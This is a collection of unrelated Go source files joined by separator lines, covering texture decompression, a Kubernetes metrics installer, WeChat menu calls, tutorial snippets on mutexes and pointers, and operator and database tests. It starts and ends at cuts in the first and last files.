return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
decodeAlphaDXT5(r, dst)
decodeColorDXT3_5(r, dst)
})
})
}
type pixel struct {
r, g, b, a int
}
func (p *pixel) setToBlackRGB() {
p.r, p.g, p.b = 0, 0, 0
}
func (p *pixel) setToBlackRGBA() {
p.r, p.g, p.b, p.a = 0, 0, 0, 0
}
func (p *pixel) setColorFrom(c pixel) {
p.r, p.g, p.b = c.r, c.g, c.b
}
func (p *pixel) setToAverage(c0, c1 pixel) {
p.r = (c0.r + c1.r) / 2
p.g = (c0.g + c1.g) / 2
p.b = (c0.b + c1.b) / 2
}
func (p *pixel) setToMix3(c0, c1 pixel) {
p.r = (2*c0.r + c1.r) / 3
p.g = (2*c0.g + c1.g) / 3
p.b = (2*c0.b + c1.b) / 3
}
func decode4x4Blocks(src []byte, width, height, depth int, decodeBlock func(r binary.Reader, dst []pixel)) ([]byte, error) {
dst := make([]byte, width*height*depth*4)
block := make([]pixel, 16)
r := endian.Reader(bytes.NewReader(src), device.LittleEndian)
for z := 0; z < depth; z++ {
dst := dst[z*width*height*4:]
for y := 0; y < height; y += 4 {
for x := 0; x < width; x += 4 {
decodeBlock(r, block)
copyToDest(block, dst, x, y, width, height)
}
}
}
return dst, nil
}
func expand565(c int) pixel {
return pixel{
((c >> 8) & 0xf8) | ((c >> 13) & 0x7),
((c >> 3) & 0xfc) | ((c >> 9) & 0x3),
((c << 3) & 0xf8) | ((c >> 2) & 0x7),
1,
}
}
func decodeDXT1(r binary.Reader, dst []pixel, black func(p *pixel)) {
c0, c1, codes := r.Uint16(), r.Uint16(), r.Uint32()
p0, p1 := expand565(int(c0)), expand565(int(c1))
for i := 0; i < 16; i++ {
dst[i].a = 255
switch codes & 0x3 {
case 0:
dst[i].setColorFrom(p0)
case 1:
dst[i].setColorFrom(p1)
case 2:
if c0 > c1 {
dst[i].setToMix3(p0, p1)
} else {
dst[i].setToAverage(p0, p1)
}
case 3:
if c0 > c1 {
dst[i].setToMix3(p1, p0)
} else {
black(&dst[i])
}
}
codes >>= 2
}
}
func decodeColorDXT3_5(r binary.Reader, dst []pixel) {
c0, c1, codes := r.Uint16(), r.Uint16(), r.Uint32()
p0, p1 := expand565(int(c0)), expand565(int(c1))
for i := 0; i < 16; i++ {
switch codes & 0x3 {
case 0:
dst[i].setColorFrom(p0)
case 1:
dst[i].setColorFrom(p1)
case 2:
dst[i].setToMix3(p0, p1)
case 3:
dst[i].setToMix3(p1, p0)
}
codes >>= 2
}
}
func decodeAlphaDXT3(r binary.Reader, dst []pixel) {
a := r.Uint64()
for i := 0; i < 16; i++ {
dst[i].a = int(a&0xf) * 0x11
a >>= 4
}
}
func decodeAlphaDXT5(r binary.Reader, dst []pixel) {
a0, a1, codes := int(r.Uint8()), int(r.Uint8()), uint64(r.Uint16())|(uint64(r.Uint32())<<16)
for i := 0; i < 16; i++ {
dst[i].a = mixAlphaDXT5(a0, a1, codes)
codes >>= 3
}
}
func mixAlphaDXT5(a0, a1 int, code uint64) int {
c := int(code & 0x7)
if a0 > a1 {
switch c {
case 0:
return a0
case 1:
return a1
default:
return (a0*(8-c) + a1*(c-1)) / 7
}
} else {
switch c {
case 0:
return a0
case 1:
return a1
case 6:
return 0
case 7:
return 255
default:
return (a0*(6-c) + a1*(c-1)) / 5
}
}
}
func copyToDest(block []pixel, dst []byte, x, y, width, height int) {
o := 4 * (y*width + x)
for dy := 0; dy < 4 && y+dy < height; dy++ {
i, p := o, dy*4
for dx := 0; dx < 4 && x+dx < width; dx++ {
dst[i+0] = sint.Byte(block[p].r)
dst[i+1] = sint.Byte(block[p].g)
dst[i+2] = sint.Byte(block[p].b)
dst[i+3] = sint.Byte(block[p].a)
i += 4
p++
}
o += 4 * width
}
}
|
package generator
const simpleStruct = `package {{.Package}}
{{if .Imports}}
import (
{{range $import := .Imports}} "{{$import}}"
{{end}})
{{end}}{{range .Tables -}}
// Table {{.Table.User}}.{{.Table.Table}}
type {{.Table.Table | ToCamel}} struct {
{{range $column := .Columns}} {{$column.Name | ToCamel}} {{$column.Type}} ` + "`" + `db:"{{$column.Name}}"` + "`" + ` // type: {{$column.Origin}}
{{end}}}
{{end}}
`
|
package menu
import (
"WeChat-golang/mp/core"
"WeChat-golang/mp/menu/createMenu"
"WeChat-golang/mp/menu/getMenu"
"fmt"
)
func Create(clt core.Client) (err error) {
// https://developers.weixin.qq.com/doc/offiaccount/Custom_Menus/Creating_Custom-Defined_Menu.html
_, err = clt.PostJson("/cgi-bin/menu/create",
nil,
&createMenu.PostBody{
Button: []createMenu.Button{
{
Type: "click",
Name: "今日歌曲",
Key: "V1001_TODAY_MUSIC",
},
},
},
nil,
)
return
}
func Get(clt core.Client) (err error) {
//https://developers.weixin.qq.com/doc/offiaccount/Custom_Menus/Querying_Custom_Menus.html
resp := new(getMenu.Response)
_, err = clt.GetJson("/cgi-bin/get_current_selfmenu_info",
nil,
resp,
)
fmt.Println(resp.SelfMenuInfo.Button)
return
}
|
package install
import (
"strings"
kumactl_cmd "github.com/kumahq/kuma/app/kumactl/pkg/cmd"
"github.com/pkg/errors"
"github.com/spf13/cobra"
"github.com/kumahq/kuma/app/kumactl/pkg/install/data"
"github.com/kumahq/kuma/app/kumactl/pkg/install/k8s"
"github.com/kumahq/kuma/app/kumactl/pkg/install/k8s/metrics"
kuma_version "github.com/kumahq/kuma/pkg/version"
)
type metricsTemplateArgs struct {
Namespace string
Mesh string
KumaPrometheusSdImage string
KumaPrometheusSdVersion string
KumaCpAddress string
WithoutPrometheus bool
WithoutGrafana bool
DashboardDataplane string
DashboardMesh string
DashboardServiceToService string
DashboardCP string
}
var DefaultMetricsTemplateArgs = metricsTemplateArgs{
Namespace: "kuma-metrics",
KumaPrometheusSdImage: "kong-docker-kuma-docker.bintray.io/kuma-prometheus-sd",
KumaPrometheusSdVersion: kuma_version.Build.Version,
KumaCpAddress: "grpc://kuma-control-plane.kuma-system:5676",
WithoutPrometheus: false,
WithoutGrafana: false,
}
func newInstallMetrics(pctx *kumactl_cmd.RootContext) *cobra.Command {
args := DefaultMetricsTemplateArgs
cmd := &cobra.Command{
Use: "metrics",
Short: "Install Metrics backend in Kubernetes cluster (Prometheus + Grafana)",
Long: `Install Metrics backend in Kubernetes cluster (Prometheus + Grafana) in a kuma-metrics namespace`,
RunE: func(cmd *cobra.Command, _ []string) error {
args.Mesh = pctx.Args.Mesh
templateFiles, err := data.ReadFiles(metrics.Templates)
if err != nil {
return errors.Wrap(err, "Failed to read template files")
}
yamlTemplateFiles := templateFiles.Filter(func(file data.File) bool {
return strings.HasSuffix(file.Name, ".yaml")
})
dashboard, err := data.ReadFile(metrics.Templates, "/grafana/kuma-dataplane.json")
if err != nil {
return err
}
args.DashboardDataplane = dashboard.String()
dashboard, err = data.ReadFile(metrics.Templates, "/grafana/kuma-mesh.json")
if err != nil {
return err
}
args.DashboardMesh = dashboard.String()
dashboard, err = data.ReadFile(metrics.Templates, "/grafana/kuma-service-to-service.json")
if err != nil {
return err
}
args.DashboardServiceToService = dashboard.String()
dashboard, err = data.ReadFile(metrics.Templates, "/grafana/kuma-cp.json")
if err != nil {
return err
}
args.DashboardCP = dashboard.String()
filter := getExcludePrefixesFilter(args.WithoutPrometheus, args.WithoutGrafana)
renderedFiles, err := renderFilesWithFilter(yamlTemplateFiles, args, simpleTemplateRenderer, filter)
if err != nil {
return errors.Wrap(err, "Failed to render template files")
}
sortedResources, err := k8s.SortResourcesByKind(renderedFiles)
if err != nil {
return errors.Wrap(err, "Failed to sort resources by kind")
}
singleFile := data.JoinYAML(sortedResources)
if _, err := cmd.OutOrStdout().Write(singleFile.Data); err != nil {
return errors.Wrap(err, "Failed to output rendered resources")
}
return nil
},
}
cmd.Flags().StringVar(&args.Namespace, "namespace", args.Namespace, "namespace to install metrics to")
cmd.Flags().StringVar(&args.KumaPrometheusSdImage, "kuma-prometheus-sd-image", args.KumaPrometheusSdImage, "image name of Kuma Prometheus SD")
cmd.Flags().StringVar(&args.KumaPrometheusSdVersion, "kuma-prometheus-sd-version", args.KumaPrometheusSdVersion, "version of Kuma Prometheus SD")
cmd.Flags().StringVar(&args.KumaCpAddress, "kuma-cp-address", args.KumaCpAddress, "the address of Kuma CP")
cmd.Flags().BoolVar(&args.WithoutPrometheus, "without-prometheus", args.WithoutPrometheus, "disable Prometheus resources generation")
cmd.Flags().BoolVar(&args.WithoutGrafana, "without-grafana", args.WithoutGrafana, "disable Grafana resources generation")
return cmd
}
func getExcludePrefixesFilter(withoutPrometheus, withoutGrafana bool) ExcludePrefixesFilter {
prefixes := []string{}
if withoutPrometheus {
prefixes = append(prefixes, "/prometheus")
}
if withoutGrafana {
prefixes = append(prefixes, "/grafana")
}
return ExcludePrefixesFilter{
Prefixes: prefixes,
}
}
|
// 152. Mutex 互斥鎖 lock 防止兩條執行緒同時對同一公共資源進行讀寫的 防止搶輸出
// https://golang.org/pkg/sync/#Mutex
// https://golang.org/pkg/sync/#RWMutex 讀/寫
// Gosched()圖
// https://studygolang.com/articles/3028
// 鎖住直到編輯結束 其他人才能用
// 在cmd執行時 使用 go run -race main.go
// ide上 goroutines: 3 還是會跑出 cmd 執行不會 Why?
//func Gosched()
//Gosched产生处理器,从而允许其他goroutine运行。 它不会暫停当前的goroutine,因此执行会自动恢复。
package main
import (
"fmt"
"runtime"
"sync"
)
func main() {
fmt.Println("cpus:", runtime.NumCPU())
fmt.Println("goroutines", runtime.NumGoroutine())
counter := 0
const gs = 100
var wg sync.WaitGroup
var mu sync.Mutex
wg.Add(gs) // 增加序 goroutines
for i := 0; i < gs; i++ {
go func() {
mu.Lock()
v := counter
// time.Sleep(time.Second) // 非網頁在 IDE要sleep 不然會跑太快 其他的99還沒done就 結束了 因而counter數量不會是1 因為還有其他的在跑
// or 先跑其他的?
runtime.Gosched()
v++
counter = v
mu.Unlock()
wg.Done() // = -1 goroutines 序?
}() // Note the parentheses - must call the function. 注意括號-必須調用該函數。
fmt.Println("*goroutines:", runtime.NumGoroutine())
}
wg.Wait() // 等到追加的序為0 goroutines
fmt.Println("goroutines", runtime.NumGoroutine())
fmt.Println("counter", counter)
}
|
package main
import "fmt"
type person struct {
name string
age int
}
func main() {
p1 := &person{"James", 20} // assigns the address to p1
fmt.Println(p1)
fmt.Println(&p1) // gives actual pointer hexadecimal value
fmt.Printf("%T\n", p1)
fmt.Println(p1.name)
// fmt.Println(*p1.name) golang is adding the "*" for you which gives you the value instead of the pointer
fmt.Println(p1.age)
// &{James 20} // this means you have a pointer but here are the values
// 0xc42006c018 // pointer
// *main.person // the type is a pointer for type person
// James // name
// 20 // age
}
|
package status
import (
"fmt"
"testing"
dynatracev1beta1 "github.com/Dynatrace/dynatrace-operator/src/api/v1beta1"
"github.com/Dynatrace/dynatrace-operator/src/dtclient"
"github.com/Dynatrace/dynatrace-operator/src/kubesystem"
"github.com/Dynatrace/dynatrace-operator/src/scheme/fake"
"github.com/stretchr/testify/assert"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)
const (
testUUID = "test-uuid"
testHost = "test-host"
testPort = uint32(1234)
testProtocol = "test-protocol"
testAnotherHost = "test-another-host"
testAnotherPort = uint32(5678)
testAnotherProtocol = "test-another-protocol"
testError = "test-error"
testVersion = "1.217.12345-678910"
testVersionPaas = "2.217.12345-678910"
)
func TestStatusOptions(t *testing.T) {
// Checks if StatusOptions struct and its properties exists
_ = Options{
DtClient: &dtclient.MockDynatraceClient{},
ApiReader: fake.NewClient(),
}
}
func TestSetDynakubeStatus(t *testing.T) {
t.Run(`set status`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return(testVersion, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypePaaS).Return(testVersionPaas, nil)
err := SetDynakubeStatus(instance, options)
assert.NoError(t, err)
assert.Equal(t, testUUID, instance.Status.KubeSystemUUID)
assert.NotNil(t, instance.Status.CommunicationHostForClient)
assert.Equal(t, testHost, instance.Status.CommunicationHostForClient.Host)
assert.Equal(t, testPort, instance.Status.CommunicationHostForClient.Port)
assert.Equal(t, testProtocol, instance.Status.CommunicationHostForClient.Protocol)
assert.NotNil(t, instance.Status.ConnectionInfo)
assert.Equal(t, testUUID, instance.Status.ConnectionInfo.TenantUUID)
assert.NotNil(t, instance.Status.ConnectionInfo.CommunicationHosts)
assert.Equal(t, []dynatracev1beta1.CommunicationHostStatus{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
}, instance.Status.ConnectionInfo.CommunicationHosts)
assert.NotNil(t, instance.Status.LatestAgentVersionUnixDefault)
assert.Equal(t, testVersion, instance.Status.LatestAgentVersionUnixDefault)
assert.Equal(t, testVersionPaas, instance.Status.LatestAgentVersionUnixPaas)
})
t.Run(`error querying kube system uid`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient()
options := Options{
DtClient: dtc,
ApiReader: clt,
}
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, "namespaces \"kube-system\" not found")
})
t.Run(`error querying communication host for client`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{}, fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying connection info`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{}, fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying latest agent version for unix / default`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return("", fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
t.Run(`error querying latest agent version for unix / paas`, func(t *testing.T) {
instance := &dynatracev1beta1.DynaKube{}
dtc := &dtclient.MockDynatraceClient{}
clt := fake.NewClient(&v1.Namespace{
ObjectMeta: metav1.ObjectMeta{
Name: kubesystem.Namespace,
UID: testUUID,
},
})
options := Options{
DtClient: dtc,
ApiReader: clt,
}
dtc.On("GetCommunicationHostForClient").Return(dtclient.CommunicationHost{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
}, nil)
dtc.On("GetOneAgentConnectionInfo").Return(dtclient.OneAgentConnectionInfo{
CommunicationHosts: []dtclient.CommunicationHost{
{
Protocol: testProtocol,
Host: testHost,
Port: testPort,
},
{
Protocol: testAnotherProtocol,
Host: testAnotherHost,
Port: testAnotherPort,
},
},
ConnectionInfo: dtclient.ConnectionInfo{
TenantUUID: testUUID,
},
}, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypeDefault).Return(testVersion, nil)
dtc.On("GetLatestAgentVersion", dtclient.OsUnix, dtclient.InstallerTypePaaS).Return("", fmt.Errorf(testError))
err := SetDynakubeStatus(instance, options)
assert.EqualError(t, err, testError)
})
}
|
// Copyright 2014 The btcbot Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// https://github.com/philsong/
// Author:Phil 78623269@qq.com
package util
import (
"fmt"
"logger"
"math"
"math/rand"
"os"
"strconv"
"time"
)
const MIN = 0.000001
// MIN 为用户自定义的比较精度
func IsEqual(f1, f2 float64) bool {
return math.Dim(f1, f2) < MIN
}
func AddRecord(record, filename string) {
file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE|os.O_APPEND, 0777)
if err != nil {
return
}
defer file.Close()
file.WriteString(fmt.Sprintf("%s\n", record))
}
func RandomString(l int) string {
rand.Seed(time.Now().UnixNano())
var result string
for i := 0; i < l; i++ {
result += string(randdigit())
}
return result
}
func randdigit() uint8 {
answers := "0123456789"
return answers[rand.Intn(len(answers))]
}
func IntegerToString(value int64) (s string) {
s = strconv.FormatInt(value, 10)
return
}
func StringToInteger(s string) (value int64) {
value, err := strconv.ParseInt(s, 10, 64)
if err != nil {
value = 0
}
return
}
func FloatToString(value float64) (s string) {
s = strconv.FormatFloat(value, 'f', -1, 64)
return
}
func StringToFloat(in string) float64 {
out, err := strconv.ParseFloat(in, 64)
if err != nil {
logger.Errorln("don't know the type, crash!", in)
}
return out
}
func InterfaceToFloat64(iv interface{}) (retV float64) {
switch ivTo := iv.(type) {
case float64:
retV = ivTo
case string:
{
var err error
retV, err = strconv.ParseFloat(ivTo, 64)
if err != nil {
logger.Errorln("convert failed, crash!")
return 0
}
}
default:
logger.Errorln(ivTo)
logger.Errorln("don't know the type, crash!")
return 0
}
return retV
}
func Exist(filename string) bool {
_, err := os.Stat(filename)
return err == nil || os.IsExist(err)
}
func DeleteFile(filepath string) {
if Exist(filepath) {
os.Remove(filepath)
}
}
|
package Controller
import (
"1/Model"
_struct "1/struct"
"github.com/gin-gonic/gin"
"net/http"
"strconv"
)
func ShowComment(c *gin.Context) {
vid := c.Query("vid")
intid, err := strconv.Atoi(vid);if err!=nil{
c.String(http.StatusBadRequest, "Error:%s", err.Error())
return
}
mp := []_struct.Comment{}
err,mp = Model.ShowComment(intid);if err!=nil{
c.String(http.StatusBadRequest, "Error:%s", err.Error())
return
}
c.JSON(200,mp)
}
|
package response
import "MCS_Server/model"
type AccountWithToken struct {
model.BaseAccount
Token string `json:"token"`
}
|
package main
import "fmt"
import "math"
func main() {
var n int
fmt.Scan(&n)
arr := make([]int, n)
var a int
for i := 0; i < n; i++ {
fmt.Scan(&a)
arr[i] = a
}
var min_cost float64
min_cost = math.Inf(0)
for i := 0; i < 100; i++ {
var cost float64
for _, x := range arr {
z := float64(i - x)
cost = cost + math.Pow(z, 2)
}
if cost < min_cost {
min_cost = cost
}
}
fmt.Println(min_cost)
}
|
// Copyright 2019 The Cockroach Authors.
//
// Use of this software is governed by the Business Source License
// included in the file licenses/BSL.txt.
//
// As of the Change Date specified in that file, in accordance with
// the Business Source License, use of this software will be governed
// by the Apache License, Version 2.0, included in the file
// licenses/APL.txt.
package split
import (
"math"
"math/rand"
"testing"
"time"
"github.com/cockroachdb/cockroach/pkg/keys"
"github.com/cockroachdb/cockroach/pkg/roachpb"
"github.com/cockroachdb/cockroach/pkg/util/encoding"
"github.com/cockroachdb/cockroach/pkg/util/leaktest"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestDecider(t *testing.T) {
defer leaktest.AfterTest(t)()
intn := rand.New(rand.NewSource(12)).Intn
var d Decider
Init(&d, intn, func() float64 { return 10.0 })
ms := func(i int) time.Time {
ts, err := time.Parse(time.RFC3339, "2000-01-01T00:00:00Z")
assert.NoError(t, err)
return ts.Add(time.Duration(i) * time.Millisecond)
}
op := func(s string) func() roachpb.Span {
return func() roachpb.Span { return roachpb.Span{Key: roachpb.Key(s)} }
}
assertQPS := func(i int, expQPS float64) {
t.Helper()
qps := d.LastQPS(ms(i))
assert.Equal(t, expQPS, qps)
}
assert.Equal(t, false, d.Record(ms(100), 1, nil))
assertQPS(100, 0)
// The first operation was interpreted as having happened after an eternity
// of no activity, and rolled over the qps to mark the beginning of a new
// second. The next qps computation is expected for timestamps >= 1100.
assert.Equal(t, ms(100), d.mu.lastQPSRollover)
assert.EqualValues(t, 0, d.mu.count)
assert.Equal(t, false, d.Record(ms(400), 4, nil))
assertQPS(100, 0)
assertQPS(700, 0)
assert.Equal(t, false, d.Record(ms(300), 3, nil))
assertQPS(100, 0)
assert.Equal(t, false, d.Record(ms(900), 1, nil))
assertQPS(0, 0)
assert.Equal(t, false, d.Record(ms(1099), 1, nil))
assertQPS(0, 0)
// Now 9 operations happened in the interval [100, 1099]. The next higher
// timestamp will decide whether to engage the split finder.
// It won't engage because the duration between the rollovers is 1.1s, and
// we had 10 events over that interval.
assert.Equal(t, false, d.Record(ms(1200), 1, nil))
assertQPS(0, float64(10)/float64(1.1))
assert.Equal(t, ms(1200), d.mu.lastQPSRollover)
var nilFinder *Finder
assert.Equal(t, nilFinder, d.mu.splitFinder)
assert.Equal(t, false, d.Record(ms(2199), 12, nil))
assert.Equal(t, nilFinder, d.mu.splitFinder)
// 2200 is the next rollover point, and 12+1=13 qps should be computed.
assert.Equal(t, false, d.Record(ms(2200), 1, op("a")))
assert.Equal(t, ms(2200), d.mu.lastQPSRollover)
assertQPS(0, float64(13))
assert.NotNil(t, d.mu.splitFinder)
assert.False(t, d.mu.splitFinder.Ready(ms(10)))
// With continued partitioned write load, split finder eventually tells us
// to split. We don't test the details of exactly when that happens because
// this is done in the finder tests.
tick := 2200
for o := op("a"); !d.Record(ms(tick), 11, o); tick += 1000 {
if tick/1000%2 == 0 {
o = op("z")
} else {
o = op("a")
}
}
assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick)))
// We were told to split, but won't be told to split again for some time
// to avoid busy-looping on split attempts.
for i := 0; i <= int(minSplitSuggestionInterval/time.Second); i++ {
o := op("z")
if i%2 != 0 {
o = op("a")
}
assert.False(t, d.Record(ms(tick), 11, o))
assert.True(t, d.LastQPS(ms(tick)) > 1.0)
// Even though the split key remains.
assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick+999)))
tick += 1000
}
// But after minSplitSuggestionInterval of ticks, we get another one.
assert.True(t, d.Record(ms(tick), 11, op("a")))
assert.True(t, d.LastQPS(ms(tick)) > 1.0)
// Split key suggestion vanishes once qps drops.
tick += 1000
assert.False(t, d.Record(ms(tick), 9, op("a")))
assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
assert.Equal(t, nilFinder, d.mu.splitFinder)
// Hammer a key with writes above threshold. There shouldn't be a split
// since everyone is hitting the same key and load can't be balanced.
for i := 0; i < 1000; i++ {
assert.False(t, d.Record(ms(tick), 11, op("q")))
tick += 1000
}
assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
// But the finder keeps sampling to adapt to changing workload...
for i := 0; i < 1000; i++ {
assert.False(t, d.Record(ms(tick), 11, op("p")))
tick += 1000
}
// ... which we verify by looking at its samples directly.
for _, sample := range d.mu.splitFinder.samples {
assert.Equal(t, roachpb.Key("p"), sample.key)
}
// Since the new workload is also not partitionable, nothing changes in
// the decision.
assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
assert.Equal(t, roachpb.Key(nil), d.MaybeSplitKey(ms(tick)))
// Get the decider engaged again so that we can test Reset().
for i := 0; i < 1000; i++ {
o := op("z")
if i%2 != 0 {
o = op("a")
}
d.Record(ms(tick), 11, o)
tick += 500
}
// The finder wants to split, until Reset is called, at which point it starts
// back up at zero.
assert.True(t, d.mu.splitFinder.Ready(ms(tick)))
assert.Equal(t, roachpb.Key("z"), d.MaybeSplitKey(ms(tick)))
d.Reset()
assert.Nil(t, d.MaybeSplitKey(ms(tick)))
assert.Nil(t, d.mu.splitFinder)
}
func TestDeciderCallsEnsureSafeSplitKey(t *testing.T) {
defer leaktest.AfterTest(t)()
intn := rand.New(rand.NewSource(11)).Intn
var d Decider
Init(&d, intn, func() float64 { return 1.0 })
baseKey := keys.SystemSQLCodec.TablePrefix(51)
for i := 0; i < 4; i++ {
baseKey = encoding.EncodeUvarintAscending(baseKey, uint64(52+i))
}
c0 := func() roachpb.Span { return roachpb.Span{Key: append([]byte(nil), keys.MakeFamilyKey(baseKey, 1)...)} }
c1 := func() roachpb.Span { return roachpb.Span{Key: append([]byte(nil), keys.MakeFamilyKey(baseKey, 9)...)} }
expK, err := keys.EnsureSafeSplitKey(c1().Key)
require.NoError(t, err)
var k roachpb.Key
var now time.Time
for i := 0; i < 2*int(minSplitSuggestionInterval/time.Second); i++ {
now = now.Add(500 * time.Millisecond)
d.Record(now, 1, c0)
now = now.Add(500 * time.Millisecond)
d.Record(now, 1, c1)
k = d.MaybeSplitKey(now)
if len(k) != 0 {
break
}
}
require.Equal(t, expK, k)
}
func TestDeciderIgnoresEnsureSafeSplitKeyOnError(t *testing.T) {
defer leaktest.AfterTest(t)()
intn := rand.New(rand.NewSource(11)).Intn
var d Decider
Init(&d, intn, func() float64 { return 1.0 })
baseKey := keys.SystemSQLCodec.TablePrefix(51)
for i := 0; i < 4; i++ {
baseKey = encoding.EncodeUvarintAscending(baseKey, uint64(52+i))
}
c0 := func() roachpb.Span {
return roachpb.Span{Key: append([]byte(nil), encoding.EncodeUvarintAscending(baseKey, math.MaxInt32+1)...)}
}
c1 := func() roachpb.Span {
return roachpb.Span{Key: append([]byte(nil), encoding.EncodeUvarintAscending(baseKey, math.MaxInt32+2)...)}
}
_, err := keys.EnsureSafeSplitKey(c1().Key)
require.Error(t, err)
var k roachpb.Key
var now time.Time
for i := 0; i < 2*int(minSplitSuggestionInterval/time.Second); i++ {
now = now.Add(500 * time.Millisecond)
d.Record(now, 1, c0)
now = now.Add(500 * time.Millisecond)
d.Record(now, 1, c1)
k = d.MaybeSplitKey(now)
if len(k) != 0 {
break
}
}
require.Equal(t, c1().Key, k)
}
|
package main
import (
"fmt"
"crypto/sha1"
"encoding/hex"
)
// func userHashGenerator(input string) (string) {
// h := sha1.New()
// h.Write([]byte(input))
// sha1_hash := hex.EncodeToString(h.Sum(nil))
// return sha1_hash
// }
func main() {
// input := "dupa"
// fmt.Println(input, userHashGenerator(input)[0:12])
}
|
package options
import (
"flag"
"fmt"
"os"
"path/filepath"
"github.com/ssddanbrown/haste/loading"
)
// Options hold all the haste specific options available
type Options struct {
Verbose bool
// Internal Services
TemplateResolver loading.TemplateResolver
// Manager Options
OutPath string
RootPath string
InputPaths []string
BuildFileExtension string
// Build Options
TagPrefix []byte
VarTagPrefix []byte
VarTagOpen []byte
VarTagClose []byte
// Server options
Watch bool
ServerPort int
LiveReload bool
}
// NewOptions provides a new set of options with defaults set
func NewOptions() *Options {
o := &Options{
BuildFileExtension: ".haste.html",
TagPrefix: []byte("t:"),
VarTagPrefix: []byte("v:"),
VarTagOpen: []byte("{{"),
VarTagClose: []byte("}}"),
Watch: false,
ServerPort: 8081,
LiveReload: true,
}
return o
}
func (o *Options) LoadFileResolver() {
templateResolver := loading.NewFileTemplateResolver(o.RootPath)
o.TemplateResolver = templateResolver
}
// ParseCommandFlags to read user-provided input from the command-line
// and update the options with what's provided.
func (o *Options) ParseCommandFlags() error {
watch := flag.Bool("w", false, "Watch HTML file and auto-compile")
port := flag.Int("p", 8081, "Provide a port to listen on")
disableLiveReload := flag.Bool("l", false, "Disable livereload (When watching only)")
verbose := flag.Bool("v", false, "Enable verbose output")
distPtr := flag.String("d", "./dist/", "Output folder for generated content")
rootPathPtr := flag.String("r", "./", "The root relative directory build path for template location")
flag.Parse()
o.Verbose = *verbose
o.Watch = *watch
o.ServerPort = *port
o.LiveReload = !*disableLiveReload
args := flag.Args()
wd, err := os.Getwd()
rootPath, err := filepath.Abs(filepath.Join(wd, *rootPathPtr))
// If provided with directory use that as root build path
if len(args) == 1 && *rootPathPtr == "./" {
stat, err := os.Stat(args[0])
if err == nil && stat.IsDir() {
rootPath, err = filepath.Abs(filepath.Join(wd, args[0]))
}
}
// Set output path
outPath, err := filepath.Abs(filepath.Join(wd, *distPtr))
if err != nil {
return err
}
err = createFolderIfNotExisting(outPath)
if err != nil {
return err
}
o.RootPath = rootPath
o.OutPath = outPath
